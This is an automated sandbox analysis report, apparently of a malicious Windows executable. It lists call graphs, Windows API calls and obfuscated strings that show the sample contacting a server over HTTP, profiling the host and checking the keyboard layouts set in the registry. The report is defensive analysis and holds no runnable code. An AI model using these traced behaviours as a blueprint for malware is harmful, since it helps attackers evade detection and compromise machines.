RtlAllocateHeap 12922->12923 12922->12924 12923->12924 12924->12920 13293 f9b7e9 13294 f9b6e5 11 API calls 13293->13294 13295 f9b811 Concurrency::details::_Reschedule_chore 13294->13295 13296 f9b836 13295->13296 13300 f9cade 13295->13300 13298 f9b648 11 API calls 13296->13298 13299 f9b84e 13298->13299 13301 f9cafc 13300->13301 13302 f9caec TpCallbackUnloadDllOnCompletion 13300->13302 13301->13296 13302->13301 12925 fbd6ef 12928 fbd6fc __cftof 12925->12928 12926 fbd727 RtlAllocateHeap 12927 fbd73a __dosmaperr 12926->12927 12926->12928 12928->12926 12928->12927 13275 f87400 13276 f87435 shared_ptr 13275->13276 13280 f8752f shared_ptr 13276->13280 13281 f9d041 13276->13281 13278 f875bd 13278->13280 13285 f9cff7 13278->13285 13284 f9d052 13281->13284 13283 f9d05a 13283->13278 13284->13283 13289 f9d0c9 13284->13289 13287 f9d006 13285->13287 13286 f9d0af 13286->13280 13287->13286 13288 f9d0ab RtlWakeAllConditionVariable 13287->13288 13288->13280 13290 f9d0d7 SleepConditionVariableCS 13289->13290 13292 f9d0f0 13289->13292 13290->13292 13292->13284 13052 f96ae0 13053 f96b10 13052->13053 13056 f946c0 13053->13056 13055 f96b5c Sleep 13055->13053 13058 f94d80 shared_ptr 13056->13058 13060 f946fb 13056->13060 13057 f94e69 shared_ptr 13057->13055 13058->13057 13084 f865b0 13058->13084 13060->13058 13061 f8bd60 5 API calls 13060->13061 13072 f94753 shared_ptr __dosmaperr 13061->13072 13062 f94f25 shared_ptr 13063 f94fee shared_ptr 13062->13063 13067 f96ab6 13062->13067 13094 f87d00 13063->13094 13065 f94ffd 13100 f882b0 13065->13100 13068 f946c0 17 API calls 13067->13068 13070 f96b5c Sleep 13068->13070 13069 f94a0d 13069->13058 13071 f8bd60 5 API calls 13069->13071 13070->13067 13074 f94a72 shared_ptr 13071->13074 13072->13069 13073 fb8979 4 API calls 13072->13073 13073->13069 13074->13058 13077 f942a0 13074->13077 13076 f95016 shared_ptr 13076->13055 13078 f942e2 13077->13078 13079 f94556 13078->13079 13082 f94308 shared_ptr 13078->13082 13081 f93550 14 API calls 13079->13081 13080 f94520 shared_ptr 13080->13058 13081->13080 13082->13080 13104 f93550 13082->13104 13093 5480c36 13084->13093 13085 f8660f LookupAccountNameA 13086 f86662 13085->13086 13087 f82280 4 API calls 13086->13087 13088 f86699 shared_ptr 13087->13088 13089 f82280 4 API calls 13088->13089 13090 f86822 shared_ptr 13088->13090 13091 f86727 shared_ptr 13089->13091 13090->13062 13091->13090 13092 f82280 4 API calls 13091->13092 13092->13091 13093->13085 13095 f87d66 shared_ptr __cftof 13094->13095 13096 f87ea3 GetNativeSystemInfo 13095->13096 13097 f87eb8 shared_ptr 13095->13097 13098 f87ea7 13095->13098 13096->13098 13097->13065 13098->13097 13179 fb8a81 13098->13179 13101 f88315 shared_ptr __cftof 13100->13101 13102 f88454 GetNativeSystemInfo 13101->13102 13103 f88333 13101->13103 13102->13103 13103->13076 13105 f9358f shared_ptr 13104->13105 13111 f93ab2 shared_ptr std::_Xinvalid_argument 13104->13111 13110 f938f5 shared_ptr __dosmaperr 13105->13110 13105->13111 13115 f8aca0 13105->13115 13106 fb8979 4 API calls 13108 f93a8a 13106->13108 13109 f93e52 13108->13109 13108->13111 13113 f93b9d 13108->13113 13137 f92e20 13109->13137 13110->13106 13110->13111 13111->13082 13120 f91dd0 13113->13120 13117 f8adf0 __cftof 13115->13117 13116 f8ae16 shared_ptr 13116->13110 13117->13116 13152 f85500 13117->13152 13119 f8af7e 13124 f91e6b shared_ptr __dosmaperr 13120->13124 13121 f91e78 13122 f8e440 6 API calls 13121->13122 13123 f92936 shared_ptr std::_Xinvalid_argument 13122->13123 13123->13111 13124->13121 13124->13123 13125 fb8979 4 API calls 13124->13125 13126 f92265 shared_ptr 13125->13126 13126->13123 13127 fb6659 RtlAllocateHeap 13126->13127 13128 f9267a 13127->13128 13128->13121 13129 fb66e7 4 API calls 13128->13129 13130 f9268b shared_ptr __dosmaperr 13129->13130 13130->13123 13131 fb8979 4 API calls 13130->13131 13132 f92759 13131->13132 13132->13121 13132->13123 13133 f927d1 13132->13133 13134 f8e440 6 API calls 13133->13134 13135 f92843 13134->13135 13135->13123 13136 f85df0 2 API calls 13135->13136 13136->13123 13138 f92ec5 __cftof 13137->13138 13139 f932f2 InternetCloseHandle InternetCloseHandle 13138->13139 13140 f93331 13139->13140 13141 f8e440 6 API calls 13140->13141 13142 f93423 shared_ptr 13141->13142 13144 f8aca0 4 API calls 13142->13144 13147 f938f5 shared_ptr __dosmaperr 13142->13147 13149 f9351a shared_ptr std::_Xinvalid_argument 13142->13149 13143 fb8979 4 API calls 13145 f93a8a 13143->13145 13144->13147 13146 f93e52 13145->13146 13145->13149 13150 f93b9d 13145->13150 13148 f92e20 12 API calls 13146->13148 13147->13143 13147->13149 13148->13149 13149->13111 13151 f91dd0 12 API calls 13150->13151 13151->13149 13153 f85520 13152->13153 13155 f85620 13153->13155 13156 f82280 13153->13156 13155->13119 13159 f82240 13156->13159 13160 f82256 13159->13160 13163 fb8667 13160->13163 13166 fb7456 13163->13166 13165 f82264 13165->13153 13167 fb7496 13166->13167 13171 fb747e __cftof __dosmaperr 13166->13171 13168 fb683a __cftof 4 API calls 13167->13168 13167->13171 13169 fb74ae 13168->13169 13172 fb7a11 13169->13172 13171->13165 13174 fb7a22 13172->13174 13173 fb7a31 __cftof __dosmaperr 13173->13171 13174->13173 13175 fb7c35 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13174->13175 13176 fb7d83 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13174->13176 13177 fb7fb5 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13174->13177 13178 fb7c0f GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 13174->13178 13175->13174 13176->13174 13177->13174 13178->13174 13180 fb86d7 4 API calls 13179->13180 13181 fb8a9f 13180->13181 13181->13097 13321 f9a140 13322 f9a1c0 13321->13322 13328 f97040 13322->13328 13324 f9a3ee shared_ptr 13325 f9a1fc shared_ptr 13325->13324 13332 f83ea0 13325->13332 13327 f9a3d6 13330 f97081 __cftof __Mtx_init_in_situ 13328->13330 13329 f972b6 13329->13325 13330->13329 13338 f82e80 13330->13338 13333 f83f08 13332->13333 13337 f83ede 13332->13337 13335 f83f18 13333->13335 13381 f82bc0 13333->13381 13335->13327 13337->13327 13339 f82ec6 13338->13339 13342 f82f2f 13338->13342 13340 f9c5dc GetSystemTimePreciseAsFileTime 13339->13340 13341 f82ed2 13340->13341 13344 f82fde 13341->13344 13347 f82edd __Mtx_unlock 13341->13347 13343 f82faf 13342->13343 13349 f9c5dc GetSystemTimePreciseAsFileTime 13342->13349 13343->13329 13345 f9c19a 10 API calls 13344->13345 13346 f82fe4 13345->13346 13348 f9c19a 10 API calls 13346->13348 13347->13342 13347->13346 13350 f82f79 13348->13350 13349->13350 13351 f9c19a 10 API calls 13350->13351 13352 f82f80 __Mtx_unlock 13350->13352 13351->13352 13353 f9c19a 10 API calls 13352->13353 13354 f82f98 __Cnd_broadcast 13352->13354 13353->13354 13354->13343 13355 f9c19a 10 API calls 13354->13355 13356 f82ffc 13355->13356 13357 f9c5dc GetSystemTimePreciseAsFileTime 13356->13357 13361 f83040 shared_ptr __Mtx_unlock 13357->13361 13358 f83185 13359 f9c19a 10 API calls 13358->13359 13360 f8318b 13359->13360 13362 f9c19a 10 API calls 13360->13362 13361->13358 13361->13360 13367 f83167 13361->13367 13369 f9c5dc GetSystemTimePreciseAsFileTime 13361->13369 13363 f83191 13362->13363 13364 f9c19a 10 API calls 13363->13364 13365 f83153 __Mtx_unlock 13364->13365 13366 f9c19a 10 API calls 13365->13366 13365->13367 13368 f8319d 13366->13368 13367->13329 13370 f8311f 13369->13370 13370->13358 13370->13363 13370->13365 13372 f9bc7c 13370->13372 13375 f9baa2 13372->13375 13374 f9bc8c 13374->13370 13376 f9bacc 13375->13376 13377 f9ce9b _xtime_get GetSystemTimePreciseAsFileTime 13376->13377 13380 f9bad4 __Xtime_diff_to_millis2 13376->13380 13378 f9baff __Xtime_diff_to_millis2 13377->13378 13379 f9ce9b _xtime_get GetSystemTimePreciseAsFileTime 13378->13379 13378->13380 13379->13380 13380->13374 13382 f82bce 13381->13382 13388 f9b777 13382->13388 13384 f82c02 13385 f82c09 13384->13385 13394 f82c40 13384->13394 13385->13327 13387 f82c18 std::_Xinvalid_argument 13389 f9b784 13388->13389 13393 f9b7a3 Concurrency::details::_Reschedule_chore 13388->13393 13397 f9caa7 13389->13397 13391 f9b794 13391->13393 13399 f9b74e 13391->13399 13393->13384 13405 f9b72b 13394->13405 13396 f82c72 shared_ptr 13396->13387 13398 f9cac2 CreateThreadpoolWork 13397->13398 13398->13391 13400 f9b757 Concurrency::details::_Reschedule_chore 13399->13400 13403 f9ccfc 13400->13403 13402 f9b771 13402->13393 13404 f9cd11 TpPostWork 13403->13404 13404->13402 13406 f9b747 13405->13406 13407 f9b737 13405->13407 13406->13396 13407->13406 13409 f9c9a8 13407->13409 13410 f9c9bd TpReleaseWork 13409->13410 13410->13406 13417 f98700 13418 f9875a __cftof 13417->13418 13424 f99ae0 13418->13424 13420 f98784 13423 f9879c 13420->13423 13428 f843b0 13420->13428 13422 f98809 std::_Throw_future_error 13425 f99b15 13424->13425 13434 f82ca0 13425->13434 13427 f99b46 13427->13420 13429 f9be0f InitOnceExecuteOnce 13428->13429 13430 f843ca 13429->13430 13431 f843d1 13430->13431 13432 fb6beb 9 API calls 13430->13432 13431->13422 13433 f843e4 13432->13433 13435 f82cdd 13434->13435 13436 f9be0f InitOnceExecuteOnce 13435->13436 13437 f82d06 13436->13437 13438 f82d48 13437->13438 13439 f82d11 13437->13439 13443 f9be27 13437->13443 13450 f82400 13438->13450 13439->13427 13444 f9be33 std::_Xinvalid_argument 13443->13444 13445 f9be9a 13444->13445 13446 f9bea3 13444->13446 13453 f9bdaf 13445->13453 13448 f82aa0 10 API calls 13446->13448 13449 f9be9f 13448->13449 13449->13438 13471 f9b506 13450->13471 13452 f82432 13454 f9cb61 InitOnceExecuteOnce 13453->13454 13455 f9bdc7 13454->13455 13456 f9bdce 13455->13456 13459 fb6beb 13455->13459 13456->13449 13458 f9bdd7 13458->13449 13460 fb6bf7 13459->13460 13461 fb8aaf __cftof 4 API calls 13460->13461 13462 fb6c26 13461->13462 13463 fb6c43 13462->13463 13464 fb6c35 13462->13464 13466 fb68bd 4 API calls 13463->13466 13465 fb6c99 9 API calls 13464->13465 13467 fb6c3f 13465->13467 13468 fb6c5d 13466->13468 13467->13458 13469 fb6c99 9 API calls 13468->13469 13470 fb6c71 __freea 13468->13470 13469->13470 13470->13458 13472 f9b521 std::_Xinvalid_argument 13471->13472 13473 fb8aaf __cftof 4 API calls 13472->13473 13474 f9b588 __cftof 13472->13474 13475 f9b5cf 13473->13475 13474->13452

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 760 f8bd60-f8bdac 761 f8c1a1-f8c1c6 call f97f30 760->761 762 f8bdb2-f8bdb6 760->762 768 f8c1c8-f8c1d4 761->768 769 f8c1f4-f8c20c 761->769 762->761 763 f8bdbc-f8bdc0 762->763 763->761 765 f8bdc6-f8be4f InternetOpenW InternetConnectA call f97870 call f85b20 763->765 793 f8be51 765->793 794 f8be53-f8be6f HttpOpenRequestA 765->794 773 f8c1ea-f8c1f1 call f9d593 768->773 774 f8c1d6-f8c1e4 768->774 770 f8c158-f8c170 769->770 771 f8c212-f8c21e 769->771 779 f8c243-f8c25f call f9cf21 770->779 780 f8c176-f8c182 770->780 777 f8c14e-f8c155 call f9d593 771->777 778 f8c224-f8c232 771->778 773->769 774->773 775 f8c26f-f8c274 call fb6b9a 774->775 777->770 778->775 784 f8c234 778->784 785 f8c188-f8c196 780->785 786 f8c239-f8c240 call f9d593 780->786 784->777 785->775 792 f8c19c 785->792 786->779 792->786 793->794 798 f8bea0-f8bf0f call f97870 call f85b20 call f97870 call f85b20 794->798 799 f8be71-f8be80 794->799 812 f8bf11 798->812 813 f8bf13-f8bf29 HttpSendRequestA 798->813 801 f8be82-f8be90 799->801 802 f8be96-f8be9d call f9d593 799->802 801->802 802->798 812->813 814 f8bf5a-f8bf82 813->814 815 f8bf2b-f8bf3a 813->815 816 f8bfb3-f8bfd4 InternetReadFile 814->816 817 f8bf84-f8bf93 814->817 818 f8bf3c-f8bf4a 815->818 819 f8bf50-f8bf57 call f9d593 815->819 823 f8bfda 816->823 821 f8bfa9-f8bfb0 call f9d593 817->821 822 f8bf95-f8bfa3 817->822 818->819 819->814 821->816 822->821 826 f8bfe0-f8c090 call fb4180 823->826
                      APIs
                      • InternetOpenW.WININET(00FD8D70,00000000,00000000,00000000,00000000), ref: 00F8BDED
                      • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F8BE11
                      • HttpOpenRequestA.WININET(?,00000000), ref: 00F8BE5B
                      • HttpSendRequestA.WININET(?,00000000), ref: 00F8BF1A
                      • InternetReadFile.WININET(?,?,000003FF,?), ref: 00F8BFCC
                      • InternetCloseHandle.WININET(?), ref: 00F8C0A7
                      • InternetCloseHandle.WININET(?), ref: 00F8C0AF
                      • InternetCloseHandle.WININET(?), ref: 00F8C0B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                      • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                      • API String ID: 688256393-332458646
                      • Opcode ID: 1eb2b7423e471bf985258c54c7037ee6217beb79e6ff48206b94eed5722ebe67
                      • Instruction ID: a8cbba21380c101ae77799ed96f51b2f8f327b5afe5d537548d876356451eeaa
                      • Opcode Fuzzy Hash: 1eb2b7423e471bf985258c54c7037ee6217beb79e6ff48206b94eed5722ebe67
                      • Instruction Fuzzy Hash: 49B1E3B1A101189BEF24DF28CC89BEEBB79EF45304F5041A9F508972D2D7749AC0DBA5

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1141 f865b0-f86609 1215 f8660a call 5480cc9 1141->1215 1216 f8660a call 5480c6a 1141->1216 1217 f8660a call 5480c8b 1141->1217 1218 f8660a call 5480d05 1141->1218 1219 f8660a call 5480ce5 1141->1219 1220 f8660a call 5480c7a 1141->1220 1221 f8660a call 5480cba 1141->1221 1222 f8660a call 5480d1b 1141->1222 1223 f8660a call 5480c3d 1141->1223 1224 f8660a call 5480d70 1141->1224 1225 f8660a call 5480d55 1141->1225 1226 f8660a call 5480c56 1141->1226 1227 f8660a call 5480c36 1141->1227 1142 f8660f-f86688 LookupAccountNameA call f97870 call f85b20 1148 f8668a 1142->1148 1149 f8668c-f866ab call f82280 1142->1149 1148->1149 1152 f866dc-f866e2 1149->1152 1153 f866ad-f866bc 1149->1153 1156 f866e5-f866ea 1152->1156 1154 f866be-f866cc 1153->1154 1155 f866d2-f866d9 call f9d593 1153->1155 1154->1155 1157 f86907 call fb6b9a 1154->1157 1155->1152 1156->1156 1159 f866ec-f86714 call f97870 call f85b20 1156->1159 1163 f8690c call fb6b9a 1157->1163 1169 f86718-f86739 call f82280 1159->1169 1170 f86716 1159->1170 1168 f86911-f86916 call fb6b9a 1163->1168 1175 f8676a-f8677e 1169->1175 1176 f8673b-f8674a 1169->1176 1170->1169 1182 f86828-f8684c 1175->1182 1183 f86784-f8678a 1175->1183 1177 f8674c-f8675a 1176->1177 1178 f86760-f86767 call f9d593 1176->1178 1177->1163 1177->1178 1178->1175 1184 f86850-f86855 1182->1184 1185 f86790-f867bd call f97870 call f85b20 1183->1185 1184->1184 1186 f86857-f868bc call f97f30 * 2 1184->1186 1198 f867bf 1185->1198 1199 f867c1-f867e8 call f82280 1185->1199 1196 f868e9-f86906 call f9cf21 1186->1196 1197 f868be-f868cd 1186->1197 1200 f868df-f868e6 call f9d593 1197->1200 1201 f868cf-f868dd 1197->1201 1198->1199 1208 f86819-f8681c 1199->1208 1209 f867ea-f867f9 1199->1209 1200->1196 1201->1168 1201->1200 1208->1185 1212 f86822 1208->1212 1210 f867fb-f86809 1209->1210 1211 f8680f-f86816 call f9d593 1209->1211 1210->1157 1210->1211 1211->1208 1212->1182 1215->1142 1216->1142 1217->1142 1218->1142 1219->1142 1220->1142 1221->1142 1222->1142 1223->1142 1224->1142 1225->1142 1226->1142 1227->1142
                      APIs
                      • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00F86650
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: AccountLookupName
                      • String ID: GVQsgL==$IVKsgL==$RBPleCSm
                      • API String ID: 1484870144-3856690409
                      • Opcode ID: f9b4b01941604ccff443b16a8821721572b6c6a94d08a3f43b9eca1dea837bfb
                      • Instruction ID: ffb5fa5dc93a22fdd5c5e8a80652ac51c01ae88ff4bd78ae339caa35e9b6ff1b
                      • Opcode Fuzzy Hash: f9b4b01941604ccff443b16a8821721572b6c6a94d08a3f43b9eca1dea837bfb
                      • Instruction Fuzzy Hash: D691A1B1A001189BDF28EB24CC85BEDB779EF45304F5045E9E509D7282EB349B84DFA5
                      APIs
                        • Part of subcall function 00F97870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F9795C
                        • Part of subcall function 00F97870: __Cnd_destroy_in_situ.LIBCPMT ref: 00F97968
                        • Part of subcall function 00F97870: __Mtx_destroy_in_situ.LIBCPMT ref: 00F97971
                        • Part of subcall function 00F8BD60: InternetOpenW.WININET(00FD8D70,00000000,00000000,00000000,00000000), ref: 00F8BDED
                        • Part of subcall function 00F8BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F8BE11
                        • Part of subcall function 00F8BD60: HttpOpenRequestA.WININET(?,00000000), ref: 00F8BE5B
                      • std::_Xinvalid_argument.LIBCPMT ref: 00F94EA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 5cdfc1da7b510472cf9478156b6c3e01c2b49be60c5072a0458351ec593806c2
                      • Instruction ID: 75726cb0fef303019d96e0a8fa6d0889060f288cb6bd520274b2750092150e0b
                      • Opcode Fuzzy Hash: 5cdfc1da7b510472cf9478156b6c3e01c2b49be60c5072a0458351ec593806c2
                      • Instruction Fuzzy Hash: 66231471E102588BFF19DB28CD8979DBB769B81304F5481D8E009AB2D2EB399F84DF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 915 f85df0-f85eee 921 f85f18-f85f25 call f9cf21 915->921 922 f85ef0-f85efc 915->922 923 f85f0e-f85f15 call f9d593 922->923 924 f85efe-f85f0c 922->924 923->921 924->923 926 f85f26-f860ad call fb6b9a call f9e080 call f97f30 * 5 RegOpenKeyExA 924->926 944 f86478-f86481 926->944 945 f860b3-f86143 call fb4020 926->945 946 f864ae-f864b7 944->946 947 f86483-f8648e 944->947 971 f86149-f8614d 945->971 972 f86466-f86472 945->972 952 f864b9-f864c4 946->952 953 f864e4-f864ed 946->953 950 f86490-f8649e 947->950 951 f864a4-f864ab call f9d593 947->951 950->951 956 f8659e-f865a3 call fb6b9a 950->956 951->946 958 f864da-f864e1 call f9d593 952->958 959 f864c6-f864d4 952->959 954 f8651a-f86523 953->954 955 f864ef-f864fa 953->955 965 f8654c-f86555 954->965 966 f86525-f86530 954->966 962 f864fc-f8650a 955->962 963 f86510-f86517 call f9d593 955->963 958->953 959->956 959->958 962->956 962->963 963->954 968 f86582-f8659d call f9cf21 965->968 969 f86557-f86566 965->969 975 f86542-f86549 call f9d593 966->975 976 f86532-f86540 966->976 977 f86578-f8657f call f9d593 969->977 978 f86568-f86576 969->978 979 f86460 971->979 980 f86153-f86187 RegEnumValueW 971->980 972->944 975->965 976->956 976->975 977->968 978->956 978->977 979->972 985 f8644d-f86454 980->985 986 f8618d-f861ad 980->986 985->980 990 f8645a 985->990 992 f861b0-f861b9 986->992 990->979 992->992 993 f861bb-f8624d call f97c50 call f98090 call f97870 * 2 call f85c60 992->993 993->985
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2994049764.0000000000F81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F80000, based on PE: true
                      • Associated: 00000006.00000002.2993952529.0000000000F80000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994049764.0000000000FE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994221904.0000000000FE9000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000000FEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000116B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001245000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.0000000001273000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000127C000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2994318678.000000000128B000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2995914399.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996144903.0000000001424000.00000040.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000006.00000002.2996167884.0000000001426000.00000080.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_f80000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: e485d778e16262c7c7968277d266812fbcc52bdccea8b49ab645e7f49c78d46c
                      • Instruction ID: 90043fccdf9a97a9cde4fccc8aa3934f56da61b21df2292e50775f3cf918d61f
                      • Opcode Fuzzy Hash: e485d778e16262c7c7968277d266812fbcc52bdccea8b49ab645e7f49c78d46c
                      • Instruction Fuzzy Hash: 97E17E71900218ABEF24EFA4CC8DBDEB779AB04304F5442D9E509AB291DB749BC49F91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1003 f87d00-f87d82 call fb4020 1007 f87d88-f87db0 call f97870 call f85b20 1003->1007 1008 f8827e-f8829b call f9cf21 1003->1008 1015 f87db2 1007->1015 1016 f87db4-f87dd6 call f97870 call f85b20 1007->1016 1015->1016 1021 f87dd8 1016->1021 1022 f87dda-f87df3 1016->1022 1021->1022 1025 f87e24-f87e4f 1022->1025 1026 f87df5-f87e04 1022->1026 1027 f87e80-f87ea1 1025->1027 1028 f87e51-f87e60 1025->1028 1029 f87e1a-f87e21 call f9d593 1026->1029 1030 f87e06-f87e14 1026->1030 1033 f87ea3-f87ea5 GetNativeSystemInfo 1027->1033 1034 f87ea7-f87eac 1027->1034 1031 f87e62-f87e70 1028->1031 1032 f87e76-f87e7d call f9d593 1028->1032 1029->1025 1030->1029 1035 f8829c call fb6b9a 1030->1035 1031->1032 1031->1035 1032->1027 1038 f87ead-f87eb6 1033->1038 1034->1038 1045 f882a1-f882a6 call fb6b9a 1035->1045 1043 f87eb8-f87ebf 1038->1043 1044 f87ed4-f87ed7 1038->1044 1047 f88279 1043->1047 1048 f87ec5-f87ecf 1043->1048 1049 f87edd-f87ee6 1044->1049 1050 f8821f-f88222 1044->1050 1047->1008 1053 f88274 1048->1053 1054 f87ee8-f87ef4 1049->1054 1055 f87ef9-f87efc 1049->1055 1050->1047 1051 f88224-f8822d 1050->1051 1056 f8822f-f88233 1051->1056 1057 f88254-f88257 1051->1057 1053->1047 1054->1053 1058 f881fc-f881fe 1055->1058 1059 f87f02-f87f09 1055->1059 1060 f88248-f88252 1056->1060 1061 f88235-f8823a 1056->1061 1064 f88259-f88263 1057->1064 1065 f88265-f88271 1057->1065 1066 f8820c-f8820f 1058->1066 1067 f88200-f8820a 1058->1067 1062 f87fe9-f881e5 call f97870 call f85b20 call f97870 call f85b20 call f85c60 call f97870 call f85b20 call f85640 call f97870 call f85b20 call f97870 call f85b20 call f85c60 call f97870 call f85b20 call f85640 call f97870 call f85b20 call f97870 call f85b20 call f85c60 call f97870 call f85b20 call f85640 1059->1062 1063 f87f0f-f87f6b call f97870 call f85b20 call f97870 call f85b20 call f85c60 1059->1063 1060->1047 1061->1060 1068 f8823c-f88246 1061->1068 1103 f881eb-f881f4 1062->1103 1089 f87f70-f87f77 1063->1089 1064->1047 1065->1053 1066->1047 1071 f88211-f8821d 1066->1071 1067->1053 1068->1047 1071->1053 1091 f87f79 1089->1091 1092 